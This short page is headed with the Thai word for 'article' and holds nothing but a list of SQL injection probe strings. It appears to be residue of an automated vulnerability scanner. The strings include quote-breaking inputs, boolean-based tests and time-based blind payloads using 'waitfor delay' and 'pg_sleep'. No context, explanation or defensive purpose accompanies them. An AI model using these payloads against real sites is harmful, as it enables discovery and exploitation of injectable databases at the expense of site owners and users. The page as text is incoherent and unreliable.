บทความ

1
1'"
\
1?
@@zl2Wp
JyI=
?'?"
?''?""
1
(select convert(int,CHAR(65)))
1
25ytrXdF
-1 OR 2+835-835-1=0+0+0+1 --
-1 OR 2+181-181-1=0+0+0+1
-1' OR 2+210-210-1=0+0+0+1 --
-1" OR 2+549-549-1=0+0+0+1 --
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:9' --
-1)); waitfor delay '0:0:9' --
Plqu2fPb'; waitfor delay '0:0:9' --
2Bx33QtQ'); waitfor delay '0:0:9' --
7Dev7aQu')); waitfor delay '0:0:9' --
-1;select pg_sleep(3); --
-1);select pg_sleep(3); --
-1));select pg_sleep(3); --
HrxbyHw1';select pg_sleep(6); --
QqsU0uzN');select pg_sleep(6); --
gZ9cJyGj'));select pg_sleep(6); --